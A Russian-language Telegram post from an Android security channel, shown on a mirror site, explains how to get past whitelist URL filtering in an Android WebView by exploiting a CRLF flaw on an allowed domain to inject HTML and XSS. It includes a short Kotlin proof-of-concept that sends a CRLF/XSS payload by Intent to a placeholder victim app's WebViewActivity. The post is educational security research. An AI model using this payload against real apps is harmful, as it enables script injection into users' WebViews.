TGViewer
Android Guards Android Guards @android_guards_today · 3.86K subscribers
Post #243 3.65K
Продолжая тему фильтров стоит сказать про более сложный в эксплуатации вариант - фильтрация по белому списку. Приложение может принимать только заданный список доменов и отклонять все остальные. Но варианты эксплуатации есть и в этом случае. Нужно сместить фокус внимания на список разрешенных доменов и искать проблемы уже в них. Допустим мы хотим грузить произвольный контент в WebView. В этом случае может помочь найденная на одном из доменов белого списка уязвимость CRLF. Чаще всего ее можно трансформировать в возможность внедрения произвольного HTML, а там уже и XSS и все остальные приятные штуки с этим связанные. Сам эксплойт может выглядеть как-то так:
val payload = "%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e"  

val i = Intent().apply {
setClassName("com.app.victim", "com.app.victim.WebViewActivity")
putExtra("url", "https://whitelisted.victim.com/$payload")
}

startActivity(i)

Подробнее: раз, два.
#aht
  • 👍 8
  • 🤔 1
More from @android_guards_today
  1. Aug 25, 2026Сегодня исполнилось 35 лет ядру Linux. Ну "исполнилось и исполнилось, чего бухтеть то?", к…
  2. Jul 29, 2026Написал небольшую заметку про один не слишком очевидный способ выполнения кода до фактичес…
  3. Jun 8, 2026Собрал тут себе игрушку для решения разных интересных задач. Может и вам пригодится 🌚 Дем…
  4. May 30, 2026Идёт шумная деревенская свадьба. Под утро пьяный вдрызг тамада, громко спрашивает: — Кто е…
  5. May 25, 2026В дополнение к предыдущему посту. Если вы получаете инвайт от бота и видите, ошибку, что с…
  6. May 24, 2026Вот и настал момент перевернуть еще одну страницу в жизни этого замечательного сообщества.…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →